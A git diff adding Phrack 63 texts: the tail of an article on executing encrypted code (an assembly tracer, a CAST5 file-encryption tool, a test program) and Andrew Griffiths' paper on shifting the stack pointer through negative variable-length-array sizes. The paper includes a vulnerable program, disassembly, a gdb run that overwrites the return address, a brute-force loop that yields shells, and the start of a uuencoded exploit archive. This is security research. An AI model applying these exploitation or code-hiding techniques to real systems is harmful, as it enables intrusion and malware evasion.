+._loop_insn_true:
+    /*
+     LOOP* condition true. Save only modified context, and jump to the
+     rel_offset_fixup to fix up traced eip.
+    */
+    pushf
+    movl %ecx, 28(%esp)
+    jmp rel_offset_fixup
+
+_jcxz:
+    /*
+     JCXZ. This is easier to simulate than to natively execute.
+    */
+    movsbl 1(%eax), %ebx            /* get signed offset */
+    cmpl $0, 28(%esp)               /* test traced ecx for 0 */
+    jz rel_offset_fixup             /* if so, fix up traced EIP */
+    jmp decryptloop_nocontext
+
+_callrel:
+    /*
+     Relative CALL.
+    */
+    movb $1, %cl                    /* 1 to indicates relative call */
+    movl 1(%eax), %ebx              /* get offset */
+
+_call:
+    /*
+     CALL emulation.
+
+     CONTEXT:
+     cl : relative/absolute indicator.
+     ebx: absolute address (cl==0) or relative offset (cl!=0).
+    */
+    movl %esp, %ebp                 /* save our stack */
+    movl traced_esp, %esp           /* push traced eip onto */
+    pushl traced_eip                /* traced stack */
+    movl %esp, traced_esp           /* write back traced stack */
+    movl %ebp, %esp                 /* restore our stack */
+    testb %cl, %cl                  /* if not zero, then it is a */
+    jnz rel_offset_fixup            /* relative call */
+    movl %ebx, traced_eip           /* store dst eip */
+    jmp decryptloop_nocontext       /* continue execution */
+
+_jmp_rel8:
+    /*
+     Relative 8-bit displacement JMP.
+    */
+    movsbl 1(%eax), %ebx            /* get signed offset */
+    jmp rel_offset_fixup
+
+_jmp_rel32:
+    /*
+     Relative 32-bit displacement JMP.
+    */
+    movl 1(%eax), %ebx              /* get offset */
+    jmp rel_offset_fixup
+
+_grp5:
+    /*
+     This is the case for 0xFF opcode which escapes to GRP5: the real
+     instruction opcode is hidden in bits 5, 4, and 3 of the modR/M byte.
+    */
+    movb MODRM+disbuf, %bl          /* get modRM byte */
+    shr $3, %bl                     /* shift bits 3-5 to 0-2 */
+    andb $7, %bl                    /* and test only bits 0-2 */
+    cmpb $2, %bl                    /* < 2, not control transfer */
+    jb _nonjump
+    cmpb $5, %bl                    /* > 5, not control transfer */
+    ja _nonjump
+    cmpb $3, %bl                    /* CALL FAR */
+    je _unhandled
+    cmpb $5, %bl                    /* JMP FAR */
+    je _unhandled
+    movb %bl, %dl                   /* for future reference */
+
+    /*
+     modR/M equals 2 or 4 (near CALL or JMP).
+     In this case the reg field of modR/M (bits 3-5) is the part of
+     instruction opcode.
+
+     Replace instruction byte 0xFF with 0x8B (MOV r/m32 to reg32 opcode).
+     Replace reg field with 3 (ebx register index).
+    */
+    movb $0x8B, (%eax)          /* replace with MOV_to_reg32 opcode */
+    movb 1(%eax), %bl           /* get modR/M byte */
+    andb $0xC7, %bl             /* mask bits 3-5 */
+    orb $0x18, %bl              /* set them to 011=3: ebx reg index */
+    movb %bl, 1(%eax)           /* set MOV target to ebx */
+
+    /*
+     We temporarily update continue location to continue execution in
+     this code instead of jumping to decryptloop. We execute MOV in TRACED
+     context because it must use traced registers for address calculation.
+     Before that we save OUR esp so that original TRACED context isn't
+     lost (MOV updates ebx, traced CALL wouldn't mess with any registers).
+
+     First we save OUR context, but after that we must restore TRACED ctx.
+     In order to do that, we must adjust esp to point to traced context
+     before restoration.
+    */
+    movl $._grp5_continue, continue
+    movl %esp, %ebp             /* save traced context pointer into ebp */
+    pusha                       /* store our context; eflags irrelevant */
+    movl %esp, our_esp          /* our context pointer */
+    movl %ebp, %esp             /* adjust traced context pointer */
+    jmp _nonjump
+
+._grp5_continue:
+    /*
+     This is where execution continues after MOV calculates effective
+     address for us.
+
+     CONTEXT upon entry:
+     ebx: target address where traced execution should continue
+     dl : opcode part (bits 3-5) of modR/M, shifted to bits 0-2
+    */
+    movl $decryptloop, continue     /* restore continue location */
+    movl our_esp, %esp              /* restore our esp */
+    movl %ebx, 16(%esp)             /* so that ebx is restored anew */
+    popa                            /* our context along with new ebx */
+    cmpb $2, %dl                    /* CALL near indirect */
+    je ._grp5_call
+    movl %ebx, traced_eip           /* JMP near indirect */
+    jmp decryptloop_nocontext
+._grp5_call:
+    xorb %cl, %cl                   /* mark: addr in ebx is absolute */
+    jmp _call
+
+_0xf:
+    /*
+     0x0F opcode esacpe for two-byte opcodes. Only 0F 0x80-0x8F range are
+     Jcc rel32 instructions. Others are normal instructions.
+    */
+    movb OPCODE2+disbuf, %cl        /* extended opcode */
+    cmpb $0x80, %cl
+    jb _nonjump                     /* < 0x80, not Jcc */
+    cmpb $0x8F, %cl
+    ja _nonjump                     /* > 0x8F, not Jcc */
+    movl 2(%eax), %ebx              /* load 32-bit offset */
+    jmp _jcc_rel32
+
+control_table:
+    /*
+     This is the jump table for instruction execution dispatch. When the
+     real opcode of the instruction is found, the tracer jumps indirectly
+     to execution routine based on this table.
+    */
+    .rept 0x0F                      /* 0x00 - 0x0E */
+    .long _nonjump                  /* normal opcodes */
+    .endr
+    .long _0xf                      /* 0x0F two-byte escape */
+
+    .rept 0x60                      /* 0x10 - 0x6F */
+    .long _nonjump                  /* normal opcodes */
+    .endr
+
+    .rept 0x10                      /* 0x70 - 0x7F */
+    .long _jcc_rel8                 /* relative 8-bit displacement */
+    .endr
+
+    .rept 0x10                      /* 0x80 - 0x8F */
+    .long _nonjump                  /* long displ jump handled from */
+    .endr                           /* _0xf opcode escape */
+
+    .rept 0x0A                      /* 0x90 - 0x99 */
+.long _nonjump
+    .endr
+    .long _unhandled                /* 0x9A: far call to full pointer */
+    .rept 0x05                      /* 0x9B - 0x9F */
+    .long _nonjump
+    .endr
+
+    .rept 0x20                      /* 0xA0 - 0xBF */
+    .long _nonjump
+    .endr
+
+    .long _nonjump, _nonjump        /* 0xC0, 0xC1 */
+    .long _unhandled                /* 0xC2: retn imm16 */
+    .long _retn                     /* 0xC3: retn */
+    .rept 0x06                      /* 0xC4 - 0xC9 */
+    .long _nonjump
+    .endr
+    .long _unhandled, _unhandled    /* 0xCA, 0xCB : far ret */
+    .rept 0x04
+    .long _nonjump
+    .endr
+
+    .rept 0x10                      /* 0xD0 - 0xDF */
+    .long _nonjump
+    .endr
+
+    .long _loopne, _loope           /* 0xE0, 0xE1 */
+    .long _loop, _jcxz              /* 0xE2, 0xE3 */
+    .rept 0x04                      /* 0xE4 - 0xE7 */
+    .long _nonjump
+    .endr
+    .long _callrel                  /* 0xE8 */
+    .long _jmp_rel32                /* 0xE9 */
+    .long _unhandled                /* far jump to full pointer */
+    .long _jmp_rel8                 /* 0xEB */
+    .rept 0x04                      /* 0xEC - 0xEF */
+    .long _nonjump
+    .endr
+
+    .rept 0x0F                      /* 0xF0 - 0xFE */
+    .long _nonjump
+    .endr
+    .long _grp5                     /* 0xFF: group 5 instructions */
+
+.data
+continue:   .long decryptloop       /* where to continue after 1 insn */
+
+.bss
+.align  4
+traced_esp: .long 0                 /* traced esp */
+traced_eip: .long 0                 /* traced eip */
+traced_ctr: .long 0                 /* incremented by 1 for each insn */
+lo_addr:    .long 0                 /* low encrypted eip */
+hi_addr:    .long 0                 /* high encrypted eip */
+our_esp:    .long 0                 /* our esp... */
+end_esp:    .long 0                 /* esp when we should stop tracing */
+local_stk:  .fill 1024, 4, 0        /* local stack space (to call C) */
+stk_end = .                         /* we need this.. */
+ilen:       .long 0                 /* instruction length */
+key:        .long 0                 /* pointer to key data */
+decrypt:    .long 0                 /* USED decryption function */
+r_decrypt:  .long 0                 /* REAL decryption function */
+disbuf:     .fill 128, 1, 0         /* xde disassembly buffer */
+
+
+
+----[ A.2 - The file encryption utility source: cryptfile.c
+
+
+
+/*
+Copyright (c) 2004 Zeljko Vrba
+
+Permission is hereby granted, free of charge, to any person obtaining
+a copy of this software and associated documentation files (the
+"Software"), to deal in the Software without restriction, including
+without limitation the rights to use, copy, modify, merge, publish,
+distribute, sublicense, and/or sell copies of the Software, and to permit
+persons to whom the Software is furnished to do so, subject to the
+following conditions:
+
+The above copyright notice and this permission notice shall be included
+in all copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
+EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
+MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
+IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
+CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT
+OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR
+THE USE OR OTHER DEALINGS IN THE SOFTWARE.
+*/
+
+/*
+ * This program encrypts a portion of the file, writing new file with
+ * .crypt appended. The permissions (execute, et al) are NOT preserved!
+ * The blocksize of 8 bytes is hardcoded.
+ */
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <errno.h>
+#include "cast5.h"
+
+#define BLOCKSIZE 8
+#define KEYSIZE 16
+
+typedef void (*cryptblock_f)(void*, u8*, const u8*);
+
+static unsigned char *decode_hex_key(char *hex)
+{
+    static unsigned char key[KEYSIZE];
+    int i;
+
+    if(strlen(hex) != KEYSIZE << 1) {
+        fprintf(stderr, "KEY must have EXACTLY %d hex digits.\n",
+          KEYSIZE << 1);
+       exit(1);
+    }
+
+    for(i = 0; i < KEYSIZE; i++, hex += 2) {
+        unsigned int x;
+        char old = hex[2];
+
+        hex[2] = 0;
+        if(sscanf(hex, "%02x", &x) != 1) {
+            fprintf(stderr, "non-hex digit in KEY.\n");
+            exit(1);
+        }
+        hex[2] = old;
+        key[i] = x;
+    }
+
+    return key;
+}
+
+static void *docrypt(
+    FILE *in, FILE *out,
+    long startoff, long endoff,
+    cryptblock_f crypt, void *ctx)
+{
+    char buf[BLOCKSIZE], enc[BLOCKSIZE];
+    long curroff = 0;
+    size_t nread = 0;
+
+    while((nread = fread(buf, 1, BLOCKSIZE, in)) > 0) {
+        long diff = startoff - curroff;
+
+        if((diff < BLOCKSIZE) && (diff > 0)) {
+            /*
+            this handles the following mis-alignment (each . is 1 byte)
+            ...[..|......]....
+                ^  ^      ^ curoff+BLOCKSIZE
+                |  startoff
+             curroff
+            */
+            if(fwrite(buf, 1, diff, out) < diff) {
+                perror("fwrite");
+                exit(1);
+            }
+            memmove(buf, buf + diff, BLOCKSIZE - diff);
+            fread(buf + BLOCKSIZE - diff, 1, diff, in);
+            curroff = startoff;
+        }
+
+        if((curroff >= startoff) && (curroff < endoff)) {
+            crypt(ctx, enc, buf);
+        } else {
+            memcpy(enc, buf, BLOCKSIZE);
+        }
+        if(fwrite(enc, 1, nread, out) < nread) {
+            perror("fwrite");
+            exit(1);
+        }
+        curroff += nread;
+    }
+}
+
+int main(int argc, char **argv)
+{
+    FILE *in, *out;
+    long startoff, endoff;
+    char outfname[256];
+    unsigned char *key;
+    struct cast5_ctx ctx;
+    cryptblock_f mode;
+
+    if(argc != 6) {
+        fprintf(stderr, "USAGE: %s <-e|-d> FILE KEY STARTOFF ENDOFF\n",
+          argv[0]);
+        fprintf(stderr, "KEY MUST be 32 hex digits (128 bits).\n");
+        return 1;
+    }
+
+    if(!strcmp(argv[1], "-e")) {
+        mode = cast5_encrypt;
+    } else if(!strcmp(argv[1], "-d")) {
+        mode = cast5_decrypt;
+    } else {
+        fprintf(stderr, "invalid mode (must be either -e od -d)\n");
+        return 1;
+    }
+
+    startoff = atol(argv[4]);
+    endoff = atol(argv[5]);
+    key = decode_hex_key(argv[3]);
+
+    if(cast5_setkey(&ctx, key, KEYSIZE) < 0) {
+        fprintf(stderr, "error setting key (maybe invalid length)\n");
+        return 1;
+    }
+
+    if((endoff - startoff) & (BLOCKSIZE-1)) {
+        fprintf(stderr, "STARTOFF and ENDOFF must span an exact multiple"
+          " of %d bytes\n", BLOCKSIZE);
+        return 1;
+    }
+    if((endoff - startoff) < BLOCKSIZE) {
+        fprintf(stderr, "STARTOFF and ENDOFF must span at least"
+          " %d bytes\n", BLOCKSIZE);
+        return 1;
+    }
+
+    sprintf(outfname, "%s.crypt", argv[2]);
+    if(!(in = fopen(argv[2], "r"))) {
+        fprintf(stderr, "fopen(%s): %s\n", argv[2], strerror(errno));
+        return 1;
+    }
+    if(!(out = fopen(outfname, "w"))) {
+        fprintf(stderr, "fopen(%s): %s\n", outfname, strerror(errno));
+        return 1;
+    }
+
+    docrypt(in, out, startoff, endoff, mode, &ctx);
+
+    fclose(in);
+    fclose(out);
+    return 0;
+}
+
+
+----[ A.3 - The test program: test2.c
+
+
+/*
+Copyright (c) 2004 Zeljko Vrba
+
+Permission is hereby granted, free of charge, to any person obtaining
+a copy of this software and associated documentation files (the
+"Software"), to deal in the Software without restriction, including
+without limitation the rights to use, copy, modify, merge, publish,
+distribute, sublicense, and/or sell copies of the Software, and to permit
+persons to whom the Software is furnished to do so, subject to the
+following conditions:
+
+The above copyright notice and this permission notice shall be included
+in all copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
+EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
+MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
+IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
+CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT
+OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR
+THE USE OR OTHER DEALINGS IN THE SOFTWARE.
+*/
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include "cast5.h"
+
+#define BLOCKSIZE 8
+#define KEYSIZE 16
+
+/*
+ * f1 and f2 are encrypted with the following 128-bit key:
+ * 5f4dcc3b5aa765d61d8327deb882cf99 (MD5 of the string 'password')
+ */
+
+static int f1(int a)
+{
+    int i, s = 0;
+
+    for(i = 0; i < a; i++) {
+        s += i*i;
+    }
+    printf("called plaintext code: f1 = %d\n", a);
+    return s;
+}
+
+static int f2(int a, int b)
+{
+    int i;
+
+    a = f1(a);
+    for(i = 0; i < b; i++) {
+        a += b;
+    }
+    return a;
+}
+
+static unsigned char *decode_hex_key(char *hex)
+{
+    static unsigned char key[KEYSIZE];
+    int i;
+
+    if(strlen(hex) != KEYSIZE << 1) {
+        fprintf(stderr, "KEY must have EXACTLY %d hex digits.\n",
+          KEYSIZE << 1);
+        exit(1);
+    }
+
+    for(i = 0; i < KEYSIZE; i++, hex += 2) {
+        unsigned int x;
+        char old = hex[2];
+
+        hex[2] = 0;
+        if(sscanf(hex, "%02x", &x) != 1) {
+            fprintf(stderr, "non-hex digit in KEY.\n");
+            exit(1);
+        }
+        hex[2] = old;
+        key[i] = x;
+    }
+
+    return key;
+}
+
+int main(int argc, char **argv)
+{
+    int a, b, result;
+    char op[16], hex[256];
+    void *esp;
+    struct cast5_ctx ctx;
+
+    printf("enter decryption key: ");
+    scanf("%255s", hex);
+    if(cast5_setkey(&ctx, decode_hex_key(hex), KEYSIZE) < 0) {
+        fprintf(stderr, "error setting key.\n");
+        return 1;
+    }
+
+    printf("a b = "); scanf("%d %d", &a, &b);
+
+    asm("movl %%esp, %0" : "=m" (esp));
+    printf("esp=%p\n", esp);
+    result = crypt_exec(cast5_decrypt, &ctx, f1, decode_hex_key,
+      f2, a, b);
+    asm("movl %%esp, %0" : "=m" (esp));
+    printf("esp=%p\n", esp);
+    printf("result = %d\n", result);
+
+    return 0;
+}
diff --git a/phrack63/14.txt b/phrack63/14.txt
new file mode 100644
index 0000000..aedf26b
--- /dev/null
+++ b/phrack63/14.txt
@@ -0,0 +1,614 @@
+                           ==Phrack Inc.==
+
+              Volume 0x0b, Issue 0x3f, Phile #0x0e of 0x14
+
+
+|=----=[ Clutching at straws: When you can shift the stack pointer ]=----=|
+|=-----------------------------------------------------------------------=|
+|=----------=[ Andrew Griffiths <andrewg@felinemenace.org> ]=------------=|
+
+--[ Table of contents
+
+1 - Introduction
+2 - The story
+2.1 - C99 standard note
+3 - Breakdown
+4 - Moving on
+4.1 - Requirements for exploitability
+5 - Links
+6 - Finishing up
+
+--[ 1 - Introduction
+
+	The paper documents a rare, but none-the less interesting bug in 
+	variable sized arrays in C. This condition appears when a user 
+	supplied length is passed via a parameter to a variable 
+	declaration in a function. 
+
+	As a result of this, an attacker may be able to "shift" the stack
+	pointer to point it to somewhere unexpected, such as above
+	the stack pointer, or somewhere else like the Global Offset
+	Table. 
+
+--[ 2 - The story
+
+	After playing a couple rounds of pool and drinking at a local 
+	pub, nemo talked about some of the fruits after the days auditing
+	session. He mentioned that there was some interesting code 
+	constructs which he hadn't fully explored yet (perhaps because 
+	I dragged him out drinking).
+
+	Basically, the code vaguely looked like: 
+
+	int function(int len, some_other_args)
+	{
+		int a;
+		struct whatever *b; 
+		unsigned long c[len];
+		
+		if(len > SOME_DEFINE) { 
+			return ERROR;
+		} 
+
+		/* rest of the code */
+	}
+
+	and we started discussing about that, and how we could take 
+	advantage of that. After various talks about the compiler emitting
+	code that wouldn't allow it, architectures that it'd work on (and 
+	caveats of those architectures), and of course, another round or 
+	two drinks, we came to the conclusion that it'd be perfectly 
+	feasible to exploit, and it would be a standard esp -= 
+	user_supplied_value;
+
+	The problem in the above code, is that if len is user-supplied 
+	it would be possible to make it negative, and move the stack 
+	pointer move closer to the top of the stack, as opposed to closer 
+	to the bottom (assuming the stack grows down.)
+
+----[ 2.1 - C99 standard note
+
+	The C99 standard allows for variable-length array declaration:
+
+	To quote, 
+
+	"In this example, the size of a variable-length array is computed 
+	 and returned from a function: 
+	 
+	 size_t fsize3 (int n)
+	 { 
+	 	char b[n+3]; //Variable length array. 
+		return sizeof b; // Execution timesizeof. 
+	 } 
+	
+	 int main() 
+	 { 
+	   size_t size; 
+	   size = fsize3(10); // fsize3 returns 13. 
+	   return 0; 
+	 }"
+	
+--[ 3 - Break down
+
+	Here is the (convoluted) C file we'll be using as an example. 
+	We'll cover more things later on in the article. 
+
+	#include <stdlib.h>
+	#include <unistd.h>
+	#include <stdio.h>
+	#include <string.h>
+	#include <sys/types.h>
+
+	int func(int len, char *stuff)
+	{
+		char x[len];
+		
+		printf("sizeof(x): %d\n", sizeof(x));
+		strncpy(x, stuff, 4);
+		return 58;
+	}
+
+	int main(int argc, char **argv)
+	{
+		return func(atoi(argv[1]), argv[2]);
+	}
+	
+	The question arises though, what instructions does the compiler 
+	generate for the func function?
+	
+	Here is the resulting disassembly from "gcc version 3.3.5 
+	(Debian 1:3.3.5-8ubuntu2)", gcc dmeiswrong.c -o dmeiswrong. 
+
+
+080483f4 <func>:
+ 80483f4: 55                   push   %ebp
+ 80483f5: 89 e5                mov    %esp,%ebp ; standard function 
+                                                ; prologue
+ 80483f7: 56                   push   %esi
+ 80483f8: 53                   push   %ebx ; preserve the appropriate 
+                                           ; register contents.
+ 80483f9: 83 ec 10             sub    $0x10,%esp ; setup local 
+                                                ; variables
+ 80483fc: 89 e6                mov    %esp,%esi ; preserve the esp 
+                                                ; register
+ 80483fe: 8b 55 08             mov    0x8(%ebp),%edx ; get the length
+ 8048401: 4a                   dec    %edx	; decrement it
+ 8048402: 8d 42 01             lea    0x1(%edx),%eax ; eax = edx + 1 
+ 8048405: 83 c0 0f             add    $0xf,%eax
+ 8048408: c1 e8 04             shr    $0x4,%eax
+ 804840b: c1 e0 04             shl    $0x4,%eax 
+
+The last three lines are eax = (((eax + 15) >> 4) << 4); This rounds up 
+and aligns eax to a paragraph boundary.
+
+ 804840e: 29 c4                sub    %eax,%esp ; adjust esp
+ 8048410: 8d 5c 24 0c          lea    0xc(%esp),%ebx ; ebx = esp + 12
+ 8048414: 8d 42 01             lea    0x1(%edx),%eax ; eax = edx + 1 
+ 8048417: 89 44 24 04          mov    %eax,0x4(%esp) ; len argument
+ 804841b: c7 04 24 78 85 04 08 movl   $0x8048578,(%esp) ; fmt string
+                                                  ; "sizeof(x): %d\n"
+ 8048422: e8 d9 fe ff ff       call   8048300 <_init+0x3c> ; printf
+
+ 8048427: c7 44 24 08 04 00 00 movl   $0x4,0x8(%esp) ; len arg to 
+ 804842e: 00                                         ; strncpy
+ 804842f: 8b 45 0c             mov    0xc(%ebp),%eax   
+ 8048432: 89 44 24 04          mov    %eax,0x4(%esp) ; data to copy
+ 8048436: 89 1c 24             mov    %ebx,(%esp)    ; where to write
+
+ ; ebx = adjusted esp + 12 (see 0x8048410)
+
+ 8048439: e8 e2 fe ff ff       call   8048320 <_init+0x5c> ; strncpy
+ 804843e: 89 f4                mov    %esi,%esp  ; restore esp
+ 8048440: b8 3a 00 00 00       mov    $0x3a,%eax ; ready to return 58 
+ 8048445: 8d 65 f8             lea    0xfffffff8(%ebp),%esp 
+				; we restore esp again, just in case it 
+				; didn't happen in the first place.
+ 8048448: 5b		       pop    %ebx
+ 8048449: 5e                   pop    %esi
+ 804844a: 5d                   pop    %ebp 
+ 804844b: c3                   ret ; restore registers and return.
+
+
+	What can we learn from the above assembly output?
+
+	1) There is some rounding done on the supplied value, thus meaning 
+           small negative values (-15 > -1) and small values (1 - 15) will 
+	   become 0. This might possibly be useful, as we'll see below.
+
+	   When the supplied value is -16 or less, then it will be possible
+	   to move the stack pointer backwards (closer to the top of the 
+	   stack).
+
+	   The instruction sub $eax, %esp at 0x804840e can be seen as add 
+	   $16, %esp when len is -16.[1]
+
+	2) The stack pointer is subtracted by the paragraph-aligned 
+	   supplied value.
+	
+	   Since we can supply an almost arbitary value to this, we can 
+	   point the stack pointer at a specified paragraph. 
+
+	   If the stack pointer value is known, we can calcuate the offset 
+	   needed to point the stack at that location in memory. This 
+	   allows us to modify writable sections such as the GOT and heap. 
+
+	3) gcc can output some wierd assembly constructs.
+	
+--[ 4 - Moving on
+
+	So what does the stack diagram look like in this case? When we 
+	reach 0x804840e (sub esp, eax) this is how it looks.
+
+			+------------+
+	0xc0000000 	|   ......   | Top of stack.
+			|   ......   |
+	0xbffff86c	| 0x08048482 | Return address
+	0xbffff868	| 0xbffff878 | Saved EBP
+	0xbffff864	|   ......   | Saved ESI 
+	0xbffff860	|   ......   | Saved EBX
+	0xbffff85c	|   ......   | Local variable space
+	0xbffff858	|   ......   | Local variable space
+	0xbffff854	|   ......   | Local variable space
+	0xbffff850 	+------------+ ESP
+	
+	To overwrite the saved return address, we need to calculate what 
+	to make it subtract by. 
+	
+	delta = 0xbffff86c - 0xbffff850
+	delta = 28
+
+	We need to subtract 12 from our delta value because of the 
+        instruction at 0x08048410 (lea 0xc(%esp),%ebx) so we end up with 16. 
+
+	If the adjusted delta was less than 16 we would end up overwriting 
+	0xbffff85c, due to the paragraph alignment. Depending what is in 
+	that memory location denotes how useful it is. In this particular 
+	case its not. If we could write more than 4 bytes, it could be 
+	useful.
+
+	When we set -16 AAAA as the arguments to dmeiswrong, we get:
+
+	andrewg@supernova:~/papers/straws$ gdb -q ./dmeiswrong
+	Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
+	(gdb) set args -16 AAAA
+	(gdb) r
+	Starting program: /home/andrewg/papers/straws/dmeiswrong -16 AAAA
+	sizeof(x): -16
+
+	Program received signal SIGSEGV, Segmentation fault.
+	0x41414141 in ?? ()
+
+	Based with the above information, an exploit can be written for 
+	dmeiswrong.c. See the attached file iyndwacyndwm.c for more 
+	information.
+
+	The attached exploit code (iyndwacyndwm.c) works on my system 
+	(gcc version: Debian 1:3.3.5-8ubuntu2, kernel: Linux supernova 
+	2.6.10-5-686 #1 Fri Jun 24 17:33:34 UTC 2005 i686 GNU/Linux) with
+	success. 
+	It may fail on the readers machine due to different initial stack 
+	layout, and different compiler options / generated code. You may 
+	need to play a bit with gdb a bit to get it working. However, this 
+	technique should work fine for other people, they may just need to 
+	play around a bit to get it working as expected.
+
+	To get it working for your system, have a look at what causes a 
+	segfault (this can be achieved with a simple 
+
+	  "for i in `seq 0 -4 -128` ; do ./dmeiswrong $i AAAA ; done" 
+
+	loop and seeing if the offset segfaults. The attached Makefile 
+	implements this loop for you when you type make bf. You can then 
+	replay the offset and args in GDB to see if EIP is pointing to 
+	0x41414141.
+
+	Then its a matter of getting the stack layout correct for so the 
+	exploit will run. In the included exploit, I've made it so it 
+	tries to determine the exact offset to where the shellcode starts. 
+	This technique is further explained in [2]. Otherwise, this 
+	technique could be done via examining the heap layout at "_start" 
+	(entry point of the executable) and looking at what is in memory 
+	from the top, and seeing the offset, as its quite possible that 
+	things have been moved around during different kernel releases.
+
+	In order to make it easier for people to play around with this 
+	technique, I've included a precompiled dmeiswrong and iyndwacyndwm 
+	files, which hopefully demonstate the problem. If iyndwacyndwm 
+	does not work for you, try iyndwacyndwm-lame which tries the 
+	standard "pick an offset from some value (like esp)" technique to 
+	try and gain code execution on the host.
+
+	I haven't performed a wide scale test against vulnerable compilers, 
+	but due to the code construct compilers would be most likely to 
+	emit, I suspect a majority of compilers which support variable 
+	sized stack arrays to be vulnerable. Thos which wouldn't be 
+	vulnerable would be those which include code to verify if this is 
+	not a problem during runtime. 
+
+	Exploitability of this type of bug appears to be feasible on other 
+	architectures, such as PPC, as I was able to get it to crash with
+	$pc being something not of my choice. (such as, 0x6f662878, and 
+	sometimes $pc would be pointing at an invalid instruction on the 
+	stack). This was done via just incrementing the value passed as 
+	the len by 4 in a loop. Make bf should point out the exploitable 
+	architectures as they should crash (eventually.)
+
+	I didn't have enough time to look into this further as the time to 
+	submit the final paper drew to close, and PPC assembly and MacOSX
+	are not my strongest skills.
+
+--[ 4.1 - Requirements for exploitability
+
+	In order for an architecture / Operating System to be exploitable, 
+	the architecture needs to support having a stack which can be moved 
+	about. If the stack contains embedded flow control information, 
+	such as saved return addresses, it makes it significantly easier 
+	to exploit, and partially less dependant on what value the stack 
+	pointer contains. This in turn increases reliability in exploits, 
+	especially remote ones.
+
+	Additionally, the compiler needs to:
+
+	- support variable sized stack arrays (which as demonstrated above, 
+	  is a feature of the C99 standard)
+
+	- not emit code that performs sanity checking of the changed stack 
+	  pointer. It is forseeable that if this issue gets a lot of public 
+	  attention, that various compiler security patches (such as 
+	  pro-police, stackguard, so fourth) will add detection of this 
+	  issue.
+
+	The direction the stack grows is not that relevant to the problem, 
+	as if the x86 stack grew upwards, the instruction at 0x804840e, 
+	would be written as addl %eax, %esp, and given the parameter len 
+	as -16 would could be rewritten as subl $16, %esp, which would 
+	allow access to the saved eip and saved frame pointer, amongst 
+	other things. 
+
+	The attached Makefile has a "bf" option which should allow you 
+	to test if your architecture is vulnerable. In order to make this 
+	work as expected, you'll need to supply the top of the stack for 
+	your architecture, and a proper shellcode. A recommended test 
+	shellcode is the trap instruction (int3 on x86, trap on ppc) which 
+	generates a particular signature when the code is executed. 
+
+	The output from the make bf command on my laptop is as follows:
+
+	andrewg@supernova:~/papers/straws/src$ make bf
+	for i in `seq 0 -4 -256` ; do ./iyndwacyndwm-lame $i ; done
+	sizeof(x): 0
+	sizeof(x): -4
+	sizeof(x): -8
+	sizeof(x): -12
+	sizeof(x): -16
+	sh-3.00$ exit
+	sizeof(x): -20
+	sh-3.00$ exit
+	sizeof(x): -24
+	sh-3.00$ exit
+	sizeof(x): -28
+	sh-3.00$ exit
+	sizeof(x): -32
+	/bin/sh: line 1: 16640 Segmentation fault      ./iyndwacyndwm-lame $i
+	sizeof(x): -36
+
+	[ snipped a bunch of Segmentation fault messages ] 	
+
+	/bin/sh: line 1: 16648 Floating point exception./iyndwacyndwm-lame $i
+	sizeof(x): -68
+	/bin/sh: line 1: 16649 Floating point exception./iyndwacyndwm-lame $i
+	sizeof(x): -72
+
+	[ snipped a bunch of Floating point exception messages and segv ] 
+
+	andrewg@supernova:~/papers/straws/src$
+
+	The make bf-trap command generates the following output:
+
+	for i in `seq 0 -4 -256` ; do ./iyndwacyndwm-lame-trap $i ; done
+	sizeof(x): 0
+	sizeof(x): -4
+	sizeof(x): -8
+	sizeof(x): -12
+	sizeof(x): -16
+	/bin/sh: line 1: 16983 Trace/breakpoint trap ./iyndwacyndwm-lame-trap $i
+	sizeof(x): -20
+	/bin/sh: line 1: 16984 Trace/breakpoint trap ./iyndwacyndwm-lame-trap $i
+	sizeof(x): -24
+
+
+--[ 5 - Links
+
+[1] http://www.eduplace.com/math/mathsteps/6/b/
+[2] http://packetstorm.linuxsecurity.com/groups/netric/envpaper.pdf
+
+--[ 6 - Finishing up
+
+I'd like to greet all of the felinemenace people ((in no particular order) 
+nevar, nemo, mercy, ash, kwine, jaguar, circut, nd and n00ne), along with 
+pulltheplug people, especially arcanum.
+
+Random greets to dme, caddis, Moby for his visual basic advice while 
+discussing this problem at the pub, and zen-parse.
+
+It kinda goes without saying, but I'd like to thank all the people who have 
+supplied feedback for my article.
+
+[ Need a challenge ? ]
+[ Visit http://www.pulltheplug.org ] 
+
+[ Want to visit Australia and want a reason? ]
+[ RUXCON is being held on 1st and 2nd of October - see you there ] 
+[ http://www.ruxcon.org.au/ ] 
+
+|=[ EOF ]=---------------------------------------------------------------=|
+
+
+begin 644 src.tar.gz
+M'XL(`"UIVD(``^Q:"W0<U7F>G=T=K5:R+%G"Q@=CQK($DB/MZBU9M@'9%K*#
+M;,F2[)A89K./6>W`:G;9F9'D!V"0#1;&A8`A;NH4$UR:!RV4Y'!2(`<#+H2V
+M28&>-"?-(<=M2".71SD))81P</_OWIG=65F`2X&<GC`Z]\[]__N_[W\?LU=Z
+M)AH4/N&G@9[VUE:\&]M;&YQO^Q$:&YK:VEK:6EJ`;VQJ;VT1Y-9/VC`\IFZ$
+M,[(LA+581AD?>5^Z#^NW';'?_T\>G<8_-JJH^G@FI8T$HI^$#L2#1O9]Q[^E
+MS1K_YK:FQM8V&O_6IO8V0?Y4@OA'/OY+52V:-&.*O%(W8DDU$DA<[,_A3$TE
